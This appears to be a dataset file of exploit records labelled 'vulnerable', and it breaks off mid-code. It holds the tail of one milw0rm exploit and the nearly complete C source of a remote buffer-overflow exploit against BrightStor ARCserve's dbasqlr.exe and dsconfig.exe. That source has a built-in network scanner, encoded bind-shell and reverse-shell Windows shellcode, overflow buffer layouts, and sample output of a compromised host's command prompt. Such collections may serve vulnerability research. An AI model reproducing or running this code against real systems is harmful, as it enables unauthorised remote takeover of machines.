0 )\n\n\t{\n\n\t\tmemcpy ( &reverseshell[111], &cbip, 4);\n\n\t\tmemcpy ( &reverseshell[118], &cbport, 2);\n\n\t\tmemcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );\n\n\t}\n\n\telse\n\n\t\tmemcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );\n\n\n\n\tprintf ( \"attacking with %u bytes...\", strlen ( buffer ) );\n\n\twrite ( s, buffer, strlen ( buffer ) );\n\n\tprintf ( \"done!\\n\" );\n\n\tclose ( s );\n\n}\n\n\n\nint\n\nmain ( int argc, char* argv[] )\n\n{\n\n\tint s;\n\n\tunsigned long cbip;\n\n\tunsigned short cbport;\n\n\tstruct sockaddr_in remote_addr;\n\n\tstruct hostent* host_addr;\n\n\n\n\tif ( argc != 2 )\n\n\t\tif ( argc != 4 )\n\n\t\t\t{ fprintf ( stderr, \"Usage\\n-----\\n[bindshell] %s <ip>\\n[reverseshell] %s <ip> <cbip> <cbport>\\n\", argv[0], argv[0] ); exit ( 1 ); }\n\n\n\n\tif ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )\n\n\t\t{ fprintf ( stderr, \"Cannot resolve hostname: %s\\n\", argv[1] ); exit ( 1 ); }\n\n\n\n\tremote_addr.sin_family = AF_INET;\n\n\tremote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );\n\n\tremote_addr.sin_port   = htons ( PORT );\n\n\n\n\ts = socket ( AF_INET, SOCK_STREAM, 0 );\n\n\tprintf ( \"connecting to %s:%u...\", argv[1], PORT );\n\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )\n\n\t\t{ printf ( \"failed!\\n\" ); exit ( 1 ); }\n\n\tprintf ( \"ok!\\n\" );\n\n\n\n\tif ( argc == 4 )\n\n\t{\n\n\t\tcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;\n\n\t\tcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;\n\n\t\texploit ( s, cbip, cbport, 0 );\n\n\t}\n\n\telse\n\n\t\texploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );\n\n}\n\n\n\n// milw0rm.com [2005-08-03]",
705        "vulnerable": true
706    },
707    {
708        "exploit_id": 1132,
709        "content": "/*\n\n * 02/20/2005\n\n *\n\n * This is provided as proof-of-concept code only for educational\n\n * purposes and testing by authorized individuals with permission\n\n * to do so.\n\n *\n\n * exploit by       : cybertronic\n\n *\n\n * cybertronic[at]gmx[dot]net\n\n *\n\n * This exploits the following vulnerabilities:\n\n *\n\n * Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe\n\n * Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe\n\n *\n\n * I included a vulnerability scanner, that scans for the bugs mentioned above\n\n * and logs to \"scan.log\" in working directory.\n\n * You have to adjust the timeout, it works fine on my network with\n\n * usec = 10000: ~10 hosts / sec\n\n *\n\n * some greetz fly to:\n\n * HD Moore - I`ll pay you some drinks, you know what they are for ;)\n\n * houseofdabus\n\n *\n\n * compile: gcc -o greetz_to_ca greetz_to_ca.c\n\n *\n\n * below is a screenshot of scan-mode:\n\n *               __              __                   _\n\n *   _______  __/ /_  ___  _____/ /__________  ____  (_)____\n\n *  / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/\n\n * / /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__\n\n * \\___/\\__, /_.___/\\___/_/   \\__/_/   \\____/_/ /_/_/\\___/\n\n *     /____/\n\n *\n\n * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n\n *\n\n * --[ choose\n\n *       |\n\n *       |--[0] = start scanner\n\n *       `--[1] = send some greetings to ca\n\n *\n\n *  $ 0\n\n *\n\n * --[ enter IP-range\n\n *       |\n\n *       |--[start-ip] $ 192.168.2.90\n\n *       `--[end-ip  ] $ 192.168.2.120\n\n *\n\n * --[ select port to scan for\n\n *       |\n\n *       |--[ 6070] = dbasqlr\n\n *       `--[41523] = dsconfig\n\n *\n\n *  $ 6070\n\n *\n\n * --[ I can try to exploit the bug, shall I ?\n\n *       |\n\n *       |--[0] yes, try it!\n\n *       `--[1] no, i`am on my own!\n\n *\n\n *  $ 0\n\n *\n\n * --[ select shellcode\n\n *       |\n\n *       |--[0] = bindshell\n\n *       `--[1] = reverseshell\n\n *\n\n *  $ 0\n\n *\n\n * oO---[ scanner - scan.log ]---Oo\n\n *\n\n * [192.168.2.90:6070] closed\n\n * [192.168.2.91:6070] closed\n\n * [192.168.2.92:6070] closed\n\n * [192.168.2.93:6070] closed\n\n * [192.168.2.94:6070] closed\n\n * [192.168.2.95:6070] closed\n\n * [192.168.2.96:6070] closed\n\n * [192.168.2.97:6070] closed\n\n * [192.168.2.98:6070] closed\n\n * [192.168.2.99:6070] closed\n\n * [192.168.2.100:6070] closed\n\n * [192.168.2.101:6070] open\n\n *\n\n\n\n// the first one is a fake service that was running by accident ( netcat -l -p 6070 )\n\n\n\n\n\n * oO---[    exploitation    ]---Oo\n\n *\n\n * --[ connecting to 192.168.2.101:6070...done!\n\n * --[ exploiting dbasqlr.exe...\n\n * --[ sending packet [ 3288 bytes ]...done!\n\n * --[ sleeping 5 seconds...\n\n * --[ connecting to 192.168.2.101:4444...failed!\n\n *\n\n * [192.168.2.102:6070] open\n\n *\n\n * oO---[    exploitation    ]---Oo\n\n *\n\n * --[ connecting to 192.168.2.102:6070...done!\n\n * --[ exploiting dbasqlr.exe...\n\n * --[ sending packet [ 3288 bytes ]...done!\n\n * --[ sleeping 5 seconds...\n\n * --[ connecting to 192.168.2.102:4444...done!\n\n * --[ b0x pwned - h4ve phun\n\n * Microsoft Windows XP [Version 5.1.2600]\n\n * (C) Copyright 1985-2001 Microsoft Corp.\n\n *\n\n * C:\\WINDOWS\\system32>exit\n\n * exit\n\n * bye bye...\n\n * [192.168.2.103:6070] closed\n\n * [192.168.2.104:6070] closed\n\n * [192.168.2.105:6070] closed\n\n * [192.168.2.106:6070] closed\n\n * [192.168.2.107:6070] closed\n\n * [192.168.2.108:6070] closed\n\n * [192.168.2.109:6070] closed\n\n * [192.168.2.110:6070] closed\n\n * [192.168.2.111:6070] closed\n\n * [192.168.2.112:6070] closed\n\n * [192.168.2.113:6070] closed\n\n * [192.168.2.114:6070] closed\n\n * [192.168.2.115:6070] closed\n\n * [192.168.2.116:6070] closed\n\n * [192.168.2.117:6070] closed\n\n * [192.168.2.118:6070] closed\n\n * [192.168.2.119:6070] closed\n\n * [192.168.2.120:6070] closed\n\n *\n\n * oO---[   scan completed   ]---Oo\n\n *\n\n * [ cybertronic @ CA ] #\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/stat.h>\n\n#include <fcntl.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n#include <unistd.h>\n\n#include <errno.h>\n\n\n\n/*\n\n *\n\n * definitions\n\n *\n\n */\n\n\n\n#define PORT_DBASQLR\t6070\n\n#define PORT_DSCONFIG\t41523\n\n\n\n#define RED\t\t\"\\E[31m\\E[1m\"\n\n#define GREEN\t\"\\E[32m\\E[1m\"\n\n#define YELLOW\t\"\\E[33m\\E[1m\"\n\n#define BLUE\t\"\\E[34m\\E[1m\"\n\n#define NORMAL\t\"\\E[m\"\n\n\n\n/*\n\n *\n\n * prototypes\n\n *\n\n */\n\n\n\nint connect_to_remote_host ( char* tip, unsigned short tport );\n\nint exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );\n\nint exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );\n\nint isip ( char *ip );\n\nint is_open ( char* ip, unsigned short tport );\n\nint select_action ();\n\nint select_shellcode ();\n\nint select_vulnerability ();\n\nint shell ( int s, char* tip, unsigned short cbport );\n\n\n\nvoid connect_to_bindshell ( char* tip, unsigned short bport );\n\nvoid fall_asleep ( int sec );\n\nvoid header ();\n\nvoid start_reverse_handler ( int cbport );\n\nvoid usage ( char* name );\n\n\n\n/*********************\n\n * Windows Shellcode *\n\n *********************/\n\n\n\n/*\n\n * Type  : bind shellcode\n\n * Length: 500 bytes\n\n * Port  : 4444 / 0x115c\n\n *\n\n */\n\n\n\nunsigned char bindshell[] =\n\n\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\"\n\n\"\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\n\n\"\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\"\n\n\"\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\"\n\n\"\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\"\n\n\"\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\"\n\n\"\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\"\n\n\"\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\"\n\n\"\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\"\n\n\"\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\"\n\n\"\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\"\n\n\"\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\"\n\n\"\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\"\n\n\"\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\"\n\n\"\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\"\n\n\"\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\"\n\n\"\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\"\n\n\"\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\"\n\n\"\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\"\n\n\"\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\"\n\n\"\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\"\n\n\"\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\"\n\n\"\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\"\n\n\"\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\"\n\n\"\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\"\n\n\"\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\"\n\n\"\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\"\n\n\"\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\"\n\n\"\\x80\\x2f\\xa2\\x04\";\n\n\n\n/*\n\n * Type  : connect back shellcode\n\n * Length: 316 bytes\n\n * CBIP  : reverseshell[111] ( ^ 0x99999999 )\n\n * CBPort: reverseshell[118] ( ^ 0x9999 )\n\n *\n\n */\n\n\n\nunsigned char reverseshell[] =\n\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\"\n\n\"\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\"\n\n\"\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\"\n\n\"\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\"\n\n\"\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\"\n\n\"\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\"\n\n\"\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\"\n\n\"\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\"\n\n\"\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\"\n\n\"\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\"\n\n\"\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\"\n\n\"\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\"\n\n\"\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\"\n\n\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"\n\n\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\"\n\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\"\n\n\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\"\n\n\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\"\n\n\"\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\";\n\n\n\nunsigned char greetz[] =\n\n\"\\x20\\x41\\x54\\x20\\x4c\\x45\\x41\\x53\\x54\\x20\\x53\\x4f\\x4d\\x45\\x20\\x47\"\n\n\"\\x52\\x45\\x45\\x54\\x5a\\x20\\x46\\x4c\\x59\\x20\\x54\\x4f\\x3a\\x20\\x48\\x44\"\n\n\"\\x4d\\x2c\\x20\\x54\\x48\\x43\\x2c\\x20\\x41\\x4e\\x44\\x20\\x43\\x41\\x20\\x4f\"\n\n\"\\x46\\x20\\x43\\x4f\\x55\\x52\\x53\\x45\\x20\\x3a\\x29\\x20\\x2d\\x20\\x43\\x59\"\n\n\"\\x42\\x45\\x52\\x54\\x52\\x4f\\x4e\\x49\\x43\\x20\";\n\n\n\n/*\n\n *\n\n * structures\n\n *\n\n */\n\n\n\ntypedef struct _args {\n\n\tchar* tip;\n\n\tchar* lip;\n\n\tint tport;\n\n\tint lport;;\n\n} args;\n\n\n\n/*\n\n *\n\n * functions\n\n *\n\n */\n\n\n\nint\n\nconnect_to_remote_host ( char* tip, unsigned short tport )\n\n{\n\n\tint s;\n\n\tstruct sockaddr_in remote_addr;\n\n\tstruct hostent* host_addr;\n\n\n\n\tmemset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\n\n\tif ( ( host_addr = gethostbyname ( tip ) ) == NULL )\n\n\t{\n\n\t\tprintf ( \"cannot resolve \\\"%s\\\"\\n\", tip );\n\n\t\texit ( 1 );\n\n\t}\n\n\tremote_addr.sin_family = AF_INET;\n\n\tremote_addr.sin_port = htons ( tport );\n\n\tremote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\n\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\n\n\t{\n\n\t\tprintf ( \"socket failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( \"--[ connecting to %s:%u...\", tip, tport  );\n\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )\n\n\t{\n\n\t\tprintf ( \"failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tprintf ( \"done!\\n\" );\n\n\treturn ( s );\n\n}\n\n\n\nint\n\nexploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )\n\n{\n\n\tunsigned long pushesp = 0x20c0c1ab; //Asbrdcst.dll\n\n\tchar buffer[3289];\n\n\n\n\tbzero ( &buffer, sizeof ( buffer ) );\n\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\n\n\tmemcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );\n\n\tmemcpy ( buffer + 1337, \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", 6 );  //good code     <-------.\n\n\tmemcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); //                      |\n\n\tmemcpy ( buffer + 3172, \"\\xe9\\xd0\\xf8\\xff\\xff\", 5 );      //jmp back 1840 bytes --'\n\n\n\n\tif ( option == 0 )\n\n\t{\n\n\t\tmemcpy ( &reverseshell[111], &xoredip, 4);\n\n\t\tmemcpy ( &reverseshell[118], &xoredcbport, 2);\n\n\t\tmemcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );\n\n\t}\n\n\telse\n\n\t\tmemcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );\n\n\n\n\tprintf ( \"--[ exploiting \" YELLOW \"dbasqlr.exe\" NORMAL\"...\\n\" );\n\n\tprintf ( \"--[ sending packet [ %u bytes ]...\", strlen ( buffer ) );\n\n\tif ( write ( s, buffer, strlen ( buffer ) ) <= 0 )\n\n\t{\n\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\n\n\t\treturn ( 1 );\n\n\t}\n\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\n\n\tsleep ( 1 );\n\n\tclose ( s );\n\n\treturn ( 0 );\n\n}\n\n\n\nint\n\nexploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )\n\n{\n\n\tchar buffer[4129];\n\n\n\n\tbzero ( &buffer, sizeof ( buffer ) );\n\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\n\n\n\n\tbuffer[ 0] = 0x9b;\n\n\tbuffer[ 1] = 0x53; //S\n\n\tbuffer[ 2] = 0x45; //E\n\n\tbuffer[ 3] = 0x52; //R\n\n\tbuffer[ 4] = 0x56; //V\n\n\tbuffer[ 5] = 0x49; //I\n\n\tbuffer[ 6] = 0x43; //C\n\n\tbuffer[ 7] = 0x45; //E\n\n\tbuffer[ 8] = 0x50; //P\n\n\tbuffer[ 9] = 0x43; //C\n\n\tbuffer[10] = 0x18;\n\n\tbuffer[11] = 0x01;\n\n\tbuffer[12] = 0x02;\n\n\tbuffer[13] = 0x03;\n\n\tbuffer[14] = 0x04;\n\n\tbuffer[15] = 0x53; //S\n\n\tbuffer[16] = 0x45; //E\n\n\tbuffer[17] = 0x52; //R\n\n\tbuffer[18] = 0x56; //V\n\n\tbuffer[19] = 0x49; //I\n\n\tbuffer[20] = 0x43; //C\n\n\tbuffer[21] = 0x45; //E\n\n\tbuffer[22] = 0x50; //P\n\n\tbuffer[23] = 0x43; //C\n\n\tbuffer[24] = 0x01;\n\n\tbuffer[25] = 0x0c;\n\n\tbuffer[26] = 0x6c;\n\n\tbuffer[27] = 0x93;\n\n\tbuffer[28] = 0xce;\n\n\tbuffer[29] = 0x18;\n\n\tbuffer[30] = 0x18;\n\n\n\n\tmemcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );\n\n\tmemcpy ( buffer + 1056, \"\\xeb\\x06\", 2 );\n\n\tmemcpy ( buffer + 1060, \"\\x14\\x57\\x80\\x23\", 4 ); //SEH\n\n\tif ( option == 0 )\n\n\t{\n\n\t\tmemcpy ( &reverseshell[111], &xoredip, 4);\n\n\t\tmemcpy ( &reverseshell[118], &xoredcbport, 2);\n\n\t\tmemcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );\n\n\t}\n\n\telse\n\n\t\tmemcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );\n\n\n\n\tprintf ( \"--[ exploiting \" YELLOW \"dsconfig.exe\" NORMAL \"...\\n\" );\n\n\tprintf ( \"--[ sending packet [ %u bytes ]...\", strlen ( buffer ) );\n\n\tif ( write ( s, buffer, strlen ( buffer ) ) <= 0 )\n\n\t{\n\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\n\n\t\treturn ( 1 );\n\n\t}\n\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\n\n\tsleep ( 1 );\n\n\tclose ( s );\n\n\treturn ( 0 );\n\n}\n\n\n\nint\n\nisip ( char *ip )\n\n{\n\n\tint a, b, c, d;\n\n\n\n\tif ( !sscanf ( ip, \"%d.%d.%d.%d\", &a, &b, &c, &d ) )\n\n\t\treturn ( 0 );\n\n\tif ( a < 1 )\n\n\t\treturn ( 0 );\n\n\tif ( a > 255 )\n\n\t\treturn 0;\n\n\tif ( b < 0 )\n\n\t\treturn 0;\n\n\tif ( b > 255 )\n\n\t\treturn 0;\n\n\tif ( c < 0 )\n\n\t\treturn 0;\n\n\tif ( c > 255 )\n\n\t\treturn 0;\n\n\tif ( d < 0 )\n\n\t\treturn 0;\n\n\tif ( d > 255 )\n\n\t\treturn 0;\n\n\treturn 1;\n\n}\n\n\n\nint\n\nis_open ( char* ip, unsigned short tport )\n\n{\n\n\tint s, n, error;\n\n\tint flags;\n\n\tint sec = 0; //change this for wan\n\n\tunsigned long usec = 10000; //works fine on my lan\n\n\tstruct sockaddr_in remote_addr;\n\n\tstruct timeval tval;\n\n\tfd_set rset, wset;\n\n\tsocklen_t len;\n\n\n\n\tmemset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\n\n\tremote_addr.sin_family = AF_INET;\n\n\tremote_addr.sin_port = htons ( tport );\n\n\tinet_pton ( AF_INET, ip, &remote_addr.sin_addr );\n\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\n\n\t{\n\n\t\tprintf ( \"socket failed!\\n\" );\n\n\t\texit ( -1 );\n\n\t}\n\n\n\n\tif ( ( flags = fcntl ( s, F_GETFL, 0 ) ) < 0 )\n\n\t{\n\n\t\tclose ( s );\n\n\t\treturn ( -1 );\n\n\t}\n\n\tif ( fcntl ( s, F_SETFL, flags | O_NONBLOCK ) < 0 )\n\n\t{\n\n\t\tclose ( s );\n\n\t\treturn ( -1 );\n\n\t}\n\n\tif ( ( n = connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ) ==  -1 )\n\n\t{\n\n\t\tif ( errno != EINPROGRESS )\n\n\t\t{\n\n\t\t\tclose ( s );\n\n\t\t\treturn ( -1 );\n\n\t\t}\n\n\t}\n\n\tif ( n == 0 )\n\n\t\tgoto done; /* connect completed immediately */\n\n\tFD_ZERO ( &rset );\n\n\tFD_SET ( s, &rset );\n\n\twset = rset;\n\n\ttval.tv_sec = sec;\n\n\ttval.tv_usec = usec;\n\n\n\n\tif ( ( n = select ( s + 1, &rset, &wset, NULL, &tval ) ) == 0 )\n\n\t{\n\n\t\tclose ( s ); /* timeout */\n\n\t\terrno = ETIMEDOUT;\n\n\t\treturn ( 1 );\n\n\t}\n\n\tif ( FD_ISSET ( s, &rset ) || FD_ISSET ( s, &wset ) )\n\n\t{\n\n\t\tlen = sizeof ( error );\n\n\t\tif ( getsockopt ( s, SOL_SOCKET, SO_ERROR, &error, &len ) < 0 )\n\n\t\t\treturn ( -1 );\n\n\t}\n\n\telse\n\n\t{\n\n\t\tprintf ( \"select failed!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\tdone:\n\n\t\tif ( fcntl ( s, F_SETFL, flags ) < 0 )\n\n\t\t{\n\n\t\t\tclose ( s );\n\n\t\t\treturn ( -1 );\n\n\t\t}\n\n\t\tif ( error )\n\n\t\t{\n\n\t\t\tclose ( s );\n\n\t\t\terrno = error;\n\n\t\t\treturn ( -1 );\n\n\t\t}\n\n\treturn ( 0 );\n\n}\n\n\n\nint\n\nselect_action ()\n\n{\n\n\tint ret;\n\n\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"--[ choose\\n\" );\n\n\tprintf ( \"      |\\n\" );\n\n\tprintf ( \"      |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = start scanner\\n\" );\n\n\tprintf ( \"      `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = send some greetings to ca\\n\" );\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%d\", &ret );\n\n\tif ( ret != 0 && ret != 1 )\n\n\t{\n\n\t\tprintf ( \"--[ invalid option!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\treturn ( ret );\n\n}\n\n\n\nint\n\nselect_shellcode ()\n\n{\n\n\tint ret;\n\n\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"--[ select shellcode\\n\" );\n\n\tprintf ( \"      |\\n\" );\n\n\tprintf ( \"      |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = bindshell\\n\" );\n\n\tprintf ( \"      `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = reverseshell\\n\" );\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%d\", &ret );\n\n\tif ( ret != 0 && ret != 1 )\n\n\t{\n\n\t\tprintf ( \"--[ invalid shellcode!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\treturn ( ret );\n\n}\n\n\n\nint\n\nselect_vulnerability ()\n\n{\n\n\tint ret;\n\n\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \"--[ select vulnerability\\n\" );\n\n\tprintf ( \"      |\\n\" );\n\n\tprintf ( \"      |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = dbasqlr\\n\" );\n\n\tprintf ( \"      `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = dsconfig\\n\" );\n\n\tprintf ( \"\\n\" );\n\n\tprintf ( \" $ \" );\n\n\tscanf ( \"%d\", &ret );\n\n\tif ( ret != 0 && ret != 1 )\n\n\t{\n\n\t\tprintf ( \"--[ invalid option!\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\treturn ( ret );\n\n}\n\n\n\nint\n\nshell ( int s, char* tip, unsigned short cbport )\n\n{\n\n\tint n;\n\n\tchar buffer[2048];\n\n\tfd_set fd_read;\n\n\n\n\tprintf ( \"--[\" YELLOW \" b\" NORMAL \"0\" YELLOW \"x \" NORMAL \"p\" YELLOW \"w\" NORMAL \"n\" YELLOW \"e\" NORMAL \"d \" YELLOW \"- \" NORMAL \"h\" YELLOW \"4\" NORMAL \"v\" 